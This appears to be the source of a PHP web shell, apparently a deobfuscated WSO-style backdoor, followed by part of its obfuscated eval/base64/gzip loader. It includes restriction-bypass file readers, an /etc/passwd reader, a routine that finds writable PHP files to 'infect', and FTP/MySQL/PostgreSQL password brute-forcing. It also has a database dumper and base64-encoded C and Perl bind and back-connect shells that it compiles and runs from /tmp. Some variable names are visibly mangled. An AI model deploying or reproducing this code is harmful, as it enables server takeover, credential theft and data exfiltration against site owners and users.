echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value="submit"></form>';
if ($temp) {
echo '<pre class="ml1" style="margin-top:5px" id="Output">' .
$temp .
'</pre>';
}
echo '</div>';
hardFooter();
}
function actionLogout()
{
setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
die('bye!');
}
function actionSelfRemove()
{
if ($_POST['p1'] == 'yes') {
if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) {
die('Shell has been removed');
} else {
echo 'unlink error!';
}
}
if ($_POST['p1'] != 'yes') {
hardHeader();
}
echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
hardFooter();
}
function actionInfect()
{
hardHeader();
echo '<h1>Infect</h1><div class=content>';
if ($_POST['p1'] == 'infect') {
$target = $_SERVER['DOCUMENT_ROOT'];
function ListFiles($dir)
{
if ($dh = opendir($dir)) {
$files = [];
$inner_files = [];
while ($file = readdir($dh)) {
if ($file != '.' && $file != '..') {
if (is_dir($dir . '/' . $file)) {
$inner_files = ListFiles($dir . '/' . $file);
if (is_array($inner_files)) {
$files = array_merge($files, $inner_files);
}
} else {
array_push($files, $dir . '/' . $file);
}
}
}
closedir($dh);
return $files;
}
}
foreach (ListFiles($target) as $key => $file) {
$nFile = substr($file, -4, 4);
if ($nFile == '.php') {
if (
$file != $_SERVER['DOCUMENT_ROOT'] . $_SERVER['PHP_SELF'] &&
is_writeable($file)
) {
echo "$file<br>";
$i++;
}
}
}
echo "<font color=red size=14>$i</font>";
} else {
echo '<form method=post><input type=submit value=Infect name=infet></form>';
echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
}
hardFooter();
}
function actionBruteforce()
{
hardHeader();
if (isset($_POST['proto'])) {
echo '<h1>Results</h1><div class=content><span>Type:</span> ' .
htmlspecialchars($_POST['proto']) .
' <span>Server:</span> ' .
htmlspecialchars($_POST['server']) .
'<br>';
if ($_POST['proto'] == 'ftp') {
function bruteForce($ip, $port, $login, $pass)
{
$fp = @ftp_connect($ip, $port ? $port : 21);
if (!$fp) {
return false;
}
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif ($_POST['proto'] == 'mysql') {
function bruteForce($ip, $port, $login, $pass)
{
$res = mysqli_connect(
$ip . ':' . ($port ? $port : 3306),
$login,
$pass
);
mysqli_close($res);
return $res;
}
} elseif ($_POST['proto'] == 'pgsql') {
function bruteForce($ip, $port, $login, $pass)
{
$str =
"host='" .
$ip .
"' port='" .
$port .
"' user='" .
$login .
"' password='" .
$pass .
"' dbname=postgres";
$res = @pg_connect($str);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(':', $_POST['server']);
if ($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if (is_array($temp)) {
foreach ($temp as $line) {
$line = explode(':', $line);
++$attempts;
if (
bruteForce(@$server[0], @$server[1], $line[0], $line[0])
) {
$success++;
echo '<b>' .
htmlspecialchars($line[0]) .
'</b>:' .
htmlspecialchars($line[0]) .
'<br>';
}
if (@$_POST['reverse']) {
$tmp = '';
for ($i = strlen($line[0]) - 1; $i >= 0; --$i) {
$tmp .= $line[0][$i];
}
++$attempts;
if (
bruteForce(@$server[0], @$server[1], $line[0], $tmp)
) {
$success++;
echo '<b>' .
htmlspecialchars($line[0]) .
'</b>:' .
htmlspecialchars($tmp);
}
}
}
}
} elseif ($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if (is_array($temp)) {
foreach ($temp as $line) {
$line = trim($line);
++$attempts;
if (
bruteForce(
$server[0],
@$server[1],
$_POST['login'],
$line
)
) {
$success++;
echo '<b>' .
htmlspecialchars($_POST['login']) .
'</b>:' .
htmlspecialchars($line) .
'<br>';
}
}
}
}
echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
}
echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' .
'<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>' .
'<input type=hidden name=c value="' .
htmlspecialchars($GLOBALS['cwd']) .
'">' .
'<input type=hidden name=a value="' .
htmlspecialchars($_POST['a']) .
'">' .
'<input type=hidden name=charset value="' .
htmlspecialchars($_POST['charset']) .
'">' .
'<input type=hidden name=ne value="">' .
'<span>Server:port</span></td>' .
'<td><input type=text name=server value="127.0.0.1"></td></tr>' .
'<tr><td><span>Brute type</span></td>' .
'<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>' .
'<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>' .
'<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>' .
'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' .
'<td><input type=text name=login value="root"></td></tr>' .
'<tr><td><span>Dictionary</span></td>' .
'<td><input type=text name=dict value="' .
htmlspecialchars($GLOBALS['cwd']) .
'passwd.dic"></td></tr></table>' .
'</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>';
echo '</div>';
hardFooter();
}
function actionSql()
{
class DbClass
{
var $type;
var $link;
var $res;
function __construct($type)
{
$this->type = $type;
}
function connect($host, $user, $pass, $dbname)
{
var_dump($host);
switch ($this->type) {
case 'mysql':
if ($this->link = mysqli_connect($host, $user, $pass)) {
return true;
}
break;
case 'pgsql':
$host = explode(':', $host);
if (!$host[1]) {
$host[1] = 5432;
}
if (
$this->link = @pg_connect(
"host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname"
)
) {
return true;
}
break;
}
return false;
}
function selectdb($db)
{
switch ($this->type) {
case 'mysql':
if (mysqli_select_db($this->link, $db)) {
return true;
}
break;
}
return false;
}
function query($str)
{
switch ($this->type) {
case 'mysql':
return $this->res = mysqli_query($this->link, $str);
break;
case 'pgsql':
return $this->res = @pg_query($this->link, $str);
break;
}
return false;
}
function fetch()
{
$res = func_num_args() ? func_get_arg(0) : $this->res;
switch ($this->type) {
case 'mysql':
return mysqli_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs()
{
switch ($this->type) {
case 'mysql':
return $this->query('SHOW databases');
break;
case 'pgsql':
return $this->res = $this->query(
"SELECT datname FROM pg_database WHERE datistemplate!='t'"
);
break;
}
return false;
}
function listTables()
{
switch ($this->type) {
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res = $this->query(
"select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"
);
break;
}
return false;
}
function error()
{
switch ($this->type) {
case 'mysql':
return mysqli_error($this->link);
break;
case 'pgsql':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str)
{
switch ($this->type) {
case 'mysql':
if (function_exists('mysql_set_charset')) {
return mysqli_set_charset($str, $this->link);
} else {
$this->query('SET CHARSET ' . $str);
}
break;
case 'pgsql':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str)
{
switch ($this->type) {
case 'mysql':
return $this->fetch(
$this->query(
"SELECT LOAD_FILE('" .
addslashes($str) .
"') as file"
)
);
break;
case 'pgsql':
$this->query(
"CREATE TABLE hard2(file text);COPY hard2 FROM '" .
addslashes($str) .
"';select file from hard2;"
);
$r = [];
while ($i = $this->fetch()) {
$r[] = $i['file'];
}
$this->query('drop table hard2');
return ['file' => implode("
", $r)];
break;
}
return false;
}
function dump($table, $fp = false)
{
switch ($this->type) {
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `' . $table . '`');
$create = mysql_fetch_array($res);
$sql = $create[1] . ";
";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$this->query('SELECT * FROM `' . $table . '`');
$i = 0;
$head = true;
while ($ = $this->fetch()) {
$sql = '';
if ($i % 1000 == 0) {
$head = true;
$sql = ";
";
}
$columns = [];
foreach ($ as $k => $v) {
if ($v === null) {
$[$k] = 'NULL';
} elseif (is_int($v)) {
$[$k] = $v;
} else {
$[$k] =
"'" . mysqli_real_escape_string($v) . "'";
}
$columns[] = '`' . $k . '`';
}
if ($head) {
$sql .=
'INSERT INTO `' .
$table .
'` (' .
implode(', ', $columns) .
") VALUES
(" .
implode(', ', $) .
')';
$head = false;
} else {
$sql .= "
,(" . implode(', ', $) . ')';
}
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$i++;
}
if (!$head) {
if ($fp) {
fwrite($fp, ";
");
} else {
echo ";
";
}
}
break;
case 'pgsql':
$this->query('SELECT * FROM ' . $table);
while ($ = $this->fetch()) {
$columns = [];
foreach ($ as $k => $v) {
$[$k] = "'" . addslashes($v) . "'";
$columns[] = $k;
}
$sql =
'INSERT INTO ' .
$table .
' (' .
implode(', ', $columns) .
') VALUES (' .
implode(', ', $) .
');' .
"
";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
}
break;
}
return false;
}
}
$db = new DbClass($_POST['type']);
if (@$_POST['p2'] == 'download' && @$_POST['p1'] != 'select') {
$db->connect(
$_POST['sql_host'],
$_POST['sql_login'],
$_POST['sql_pass'],
$_POST['sql_base']
);
$db->selectdb($_POST['sql_base']);
switch ($_POST['charset']) {
case 'Windows-1251':
$db->setCharset('cp1251');
break;
case 'UTF-8':
$db->setCharset('utf8');
break;
case 'KOI8-R':
$db->setCharset('koi8r');
break;
case 'KOI8-U':
$db->setCharset('koi8u');
break;
case 'cp866':
$db->setCharset('cp866');
break;
}
if (empty($_POST['file'])) {
ob_start('ob_gzhandler', 4096);
header('Content-Disposition: attachment; filename=dump.sql');
header('Content-Type: text/plain');
foreach ($_POST['tbl'] as $v) {
$db->dump($v);
}
exit();
} elseif ($fp = @fopen($_POST['file'], 'w')) {
foreach ($_POST['tbl'] as $v) {
$db->dump($v, $fp);
}
fclose($fp);
unset($_POST['p2']);
} else {
die(
'<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'
);
}
}
hardHeader();
echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p3 value=''><input type=hidden name=p2 value=''><input type=hidden name=c value='" .
htmlspecialchars($GLOBALS['cwd']) .
"'><input type=hidden name=charset value='" .
(isset($_POST['charset']) ? $_POST['charset'] : '') .
"'>
<td><label><select name='type'><option value='mysql' ";
if (@$_POST['type'] == 'mysql') {
echo 'selected';
}
echo ">MySql</option><option value='pgsql' ";
if (@$_POST['type'] == 'pgsql') {
echo 'selected';
}
echo ">PostgreSql</option></select></label></td>
<td><input type=text name=sql_host value=\"" .
(empty($_POST['sql_host'])
? 'localhost'
: htmlspecialchars($_POST['sql_host'])) .
"\"></td>
<td><input type=text name=sql_login value=\"" .
(empty($_POST['sql_login'])
? 'root'
: htmlspecialchars($_POST['sql_login'])) .
"\"></td>
<td><input type=text name=sql_pass value=\"" .
(empty($_POST['sql_pass'])
? ''
: htmlspecialchars($_POST['sql_pass'])) .
"\" required></td><td>";
$tmp = "<input type=text name=sql_base value=''>";
if (isset($_POST['sql_host'])) {
if (
$db->connect(
$_POST['sql_host'],
$_POST['sql_login'],
$_POST['sql_pass'],
$_POST['sql_base']
)
) {
switch ($_POST['charset']) {
case 'Windows-1251':
$db->setCharset('cp1251');
break;
case 'UTF-8':
$db->setCharset('utf8');
break;
case 'KOI8-R':
$db->setCharset('koi8r');
break;
case 'KOI8-U':
$db->setCharset('koi8u');
break;
case 'cp866':
$db->setCharset('cp866');
break;
}
$db->listDbs();
echo "<label><select name=sql_base><option value=''></option>";
while ($ = $db->fetch()) {
list($key, $value) = each($);
echo '<option value="' .
$value .
'" ' .
($value == $_POST['sql_base'] ? 'selected' : '') .
'>' .
$value .
'</option>';
}
echo '</select></label>';
} else {
echo $tmp;
}
} else {
echo $tmp;
}
echo "</td>
<td><input type=submit value='submit' onclick='fs(d.sf);'></td>
<td><input type=checkbox name=sql_count value='on'" .
(empty($_POST['sql_count']) ? '' : ' checked') .
"> count the number of rows</td>
</tr>
</table>
<script>
s_db='" .
@addslashes($_POST['sql_base']) .
"';
function fs(f) {
if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
if(f.p1) f.p1.value='';
if(f.p2) f.p2.value='';
if(f.p3) f.p3.value='';
}
}
function st(t,l) {
d.sf.p1.value = 'select';
d.sf.p2.value = t;
if(l && d.sf.p3) d.sf.p3.value = l;
d.sf.submit();
}
function is() {
for(i=0;i<d.sf.elements['tbl[]'].length;++i)
d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
}
</script>";
if (isset($db) && $db->link) {
echo '<br/><table width=100% cellpadding=2 cellspacing=0>';
if (!empty($_POST['sql_base'])) {
$db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
$tbls_res = $db->listTables();
while ($ = $db->fetch($tbls_res)) {
list($key, $value) = each($);
if (!empty($_POST['sql_count'])) {
$n = $db->fetch(
$db->query('SELECT COUNT(*) as n FROM ' . $value . '')
);
}
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='" .
$value .
"'> <a href=# onclick=\"st('" .
$value .
"',1)\">" .
$value .
'</a>' .
(empty($_POST['sql_count'])
? ' '
: " <small>({$n['n']})</small>") .
'</nobr><br>';
}
echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
if (@$_POST['p1'] == 'select') {
$_POST['p1'] = 'query';
$_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
$num = $db->fetch();
$pages = ceil($num['n'] / 30);
echo "<script>d.sf.onsubmit=function(){st(\"" .
$_POST['p2'] .
"\", d.sf.p3.value)}</script><span>" .
$_POST['p2'] .
"</span> ({$num['n']} records) Page # <input type=text name='p3' value=" .
((int) $_POST['p3']) .
'>';
echo " of $pages";
if ($_POST['p3'] > 1) {
echo " <a href=# onclick='st(\"" .
$_POST['p2'] .
'", ' .
($_POST['p3'] - 1) .
")'>< Prev</a>";
}
if ($_POST['p3'] < $pages) {
echo " <a href=# onclick='st(\"" .
$_POST['p2'] .
'", ' .
($_POST['p3'] + 1) .
")'>Next ></a>";
}
$_POST['p3']--;
if ($_POST['type'] == 'pgsql') {
$_POST['p2'] =
'SELECT * FROM ' .
$_POST['p2'] .
' LIMIT 30 OFFSET ' .
$_POST['p3'] * 30;
} else {
$_POST['p2'] =
'SELECT * FROM `' .
$_POST['p2'] .
'` LIMIT ' .
$_POST['p3'] * 30 .
',30';
}
echo '<br><br>';
}
if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) {
$db->query(@$_POST['p2']);
if ($db->res !== false) {
$title = false;
echo '<table width=100% cellspacing=1 cellpadding=2 class=main>';
$line = 1;
while ($ = $db->fetch()) {
if (!$title) {
echo '<tr>';
foreach ($ as $key => $value) {
echo '<th>' . $key . '</th>';
}
reset($);
$title = true;
echo '</tr><tr>';
$line = 2;
}
echo '<tr class="l' . $line . '">';
$line = $line == 1 ? 2 : 1;
foreach ($ as $key => $value) {
if ($value == null) {
echo '<td><i>null</i></td>';
} else {
echo '<td>' .
nl2br(htmlspecialchars($value)) .
'</td>';
}
}
echo '</tr>';
}
echo '</table>';
} else {
echo '<div><b>Error:</b> ' .
htmlspecialchars($db->error()) .
'</div>';
}
}
echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') {
echo htmlspecialchars($_POST['p2']);
}
echo "</textarea><br/><input type=submit value='Execute'>";
echo '</td></tr>';
}
echo '</table></form><br/>';
if ($_POST['type'] == 'mysql') {
$db->query(
"SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"
);
if ($db->fetch()) {
echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='submit'></form>";
}
}
if (@$_POST['p1'] == 'loadfile') {
$file = $db->loadFile($_POST['p2']);
echo '<br/><pre class=ml1>' .
htmlspecialchars($file['file']) .
'</pre>';
}
} else {
echo htmlspecialchars($db->error());
}
echo '</div>';
hardFooter();
}
function actionNetwork()
{
hardHeader();
$back_connect_c =
'I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9';
$back_connect_p =
'IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';
$bind_port_c =
'I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9';
$bind_port_p =
'IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=';
echo "<h1>Network tools</h1><div class=content>
<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
<span>Bind port to /bin/sh</span><br/>
Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>
</form>
<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
<span>Back-connect to</span><br/>
Server: <input type='text' name='server' value=" .
$_SERVER['REMOTE_ADDR'] .
"> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>
</form><br>";
if (isset($_POST['p1'])) {
function cf($f, $t)
{
($w = @fopen($f, 'w')) or @function_exists('file_put_contents');
if ($w) {
@fwrite($w, base64_decode($t)) or
@fputs($w, base64_decode($t)) or
@file_put_contents($f, base64_decode($t));
@fclose($w);
}
}
if ($_POST['p1'] == 'bpc') {
cf('/tmp/bp.c', $bind_port_c);
$ = ex('gcc -o /tmp/bp /tmp/bp.c');
@unlink('/tmp/bp.c');
$ .= ex('/tmp/bp ' . $_POST['p2'] . ' ' . $_POST['p3'] . ' &');
echo "<pre class=ml1>$" . ex('ps aux | grep bp') . '</pre>';
}
if ($_POST['p1'] == 'bpp') {
cf('/tmp/bp.pl', $bind_port_p);
$ = ex(which('perl') . ' /tmp/bp.pl ' . $_POST['p2'] . ' &');
echo "<pre class=ml1>$" . ex('ps aux | grep bp.pl') . '</pre>';
}
if ($_POST['p1'] == 'bcc') {
cf('/tmp/bc.c', $back_connect_c);
$ = ex('gcc -o /tmp/bc /tmp/bc.c');
@unlink('/tmp/bc.c');
$ .= ex('/tmp/bc ' . $_POST['p2'] . ' ' . $_POST['p3'] . ' &');
echo "<pre class=ml1>$" . ex('ps aux | grep bc') . '</pre>';
}
if ($_POST['p1'] == 'bcp') {
cf('/tmp/bc.pl', $back_connect_p);
$ = ex(
which('perl') .
' /tmp/bc.pl ' .
$_POST['p2'] .
' ' .
$_POST['p3'] .
' &'
);
echo "<pre class=ml1>$" . ex('ps aux | grep bc.pl') . '</pre>';
}
}
echo '</div>';
hardFooter();
}
if (empty($_POST['a'])) {
if (isset($) && function_exists('action' . $)) {
$_POST['a'] = $;
} else {
$_POST['a'] = 'FilesMan';
}
}
if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) {
call_user_func('action' . $_POST['a']);
}
Did this file decode correctly?
Original Code
<?php
eval(
str_rot13(
gzuncompress(
base64_decode(
'eNpVjk0LgkAURdcF/gcR17OKNtKmnPJb0yJoEyqamPOpaPjrmwlSe8vz3jv3KnqUYnowLeJEmbpTtQ5VmqGj2g9eSdM4bSlhSrMxF7ji4/FMYMIlLHhZasZ6JUfR7/QJb/UJuWK1dIKlC8yG6bHYeyMLQiSVBJdcxGBq9Z4Z2xJtNw8mUMda5+rHuM8l5FQgZ7DdPCJv2wq+lxnjcx14udDCDFtrgLLQLwRMbrBQgj+X8QGz8E9e'
)
)
)
);
eval(
$MctRJwTzX(
$RGGcrQBfUjR(
'eJztvet22ziyKPx/1pp3YNSepty2ZUm+dGJbThxfEufmxJfcszUUSUmMJVFNUr4knb/nEWadc/ZZa6/zDOdFvmeYJ/mqCgAJkCBFOU5P7722upNIJFAoFAqFQqFQ9de/zP3zH/9utAzTqTe6HcdZt5vur/WVu93mqmOtrLn2unt3ve4275qbf8Wy/xPKRsHEZb/+D9Y8Oz1YEq//Nz448AZu+Nwa8Wf/C54NnbXqXPtk//j1/vEH8/Hp6cv2Gfxq7zzaf3FqfpqHkl7XqN7xwtCNoOTu0dHTw/0PmmqPj06wglEzzHP3Gr7NG1//+hcDPuPAj/zoeuxWp1dbNBAxbPYba9kdjqNrqPQSyn0w7b4VACIy9Mwr6BVSIAERI88Kjly5OhZQ31vya7kFi2B7tj+6qCZv8WNOoi6QelF9msEs9d5x7eB6rDQM3Z+FxAk8pBj++y2vV3Zer+wf3Cv7R/Zq3MjrFr75of3CBn5gx5q5HWv+6I41f2jHVnI7tvKjO7ZyOx2D/7uTkR15/ihpI4wCgD2+dKCOkEzwCzrUsUJ3fbXtjmzfcatUhMPCSkkBAEUF4GFcACq17T4WMk35GauYPPPgV53/uOyDmDeq8GzLgHIDd8RgKkTv+gEU+UzVDPg3KUr4waOFBaVCCh34u+oHDkH+MOcBzf7NoN9Q/cPcZxjiTU1dRLvWiuGki3gLC6lHyD/Qke1Wfk/EpxO41nmq+rfk5zeFLwM3mgSjNOU5inz1+etfHngjr43Ma7pB4Aftgd+DBWo0GQywSPIWnrepRAiv6+q7oXXVdq9ce4Ls0o68oRuXgff0oD3whl5UZQ8dt+uN3KoJTHlyePQCCpuNWt3Ed3/9y/IvRvX/+7/zRqNRa9YbDcM/7hi/LOMbWuf4WgmKQ9H6NrbCEJn855/56q8+btHy+e8Kjcus4IusWnb+J2DKaxGAx++/yyJieg3jDkOc1VLQB/ngPPN73qiqzuLZNRvrs3WlKh8zVINpU+34/mAe8fyfm6ogkXCMBYg8qAU6mipNJ6Eb7PTcURRCex9ScvSR7/cGblqQmieDSTDOPH1+8uKhH2Uee1bbCuy+d+EGmXfvrJHjXmUeH1vDzkAt/kmaqiqXMIZze+2hFdn9anamm8smENUbjgc4a83fUWlMek0EX/bSOLDRyiWiWliW+2lZ03ctxw2qBGIZpqaxWl81XviRceBPRo6ZlnvuFUxt+aEqiBzPlXpY2epHw8H2FraxnTzeGrqRZYysodsyHTe0A2+MPGMasFRG0OeWeRC4YT8C3gprIzcyfjekB+NL9Xfk85+n+BPePXTDyDgZW8OhN+oZJ31/DA/PYCCDXoB9Mp5bwTmsrzkYwUp5CaI//JOgY02ivh+kkSHg5rZhpCv1o2i85P428S5a5i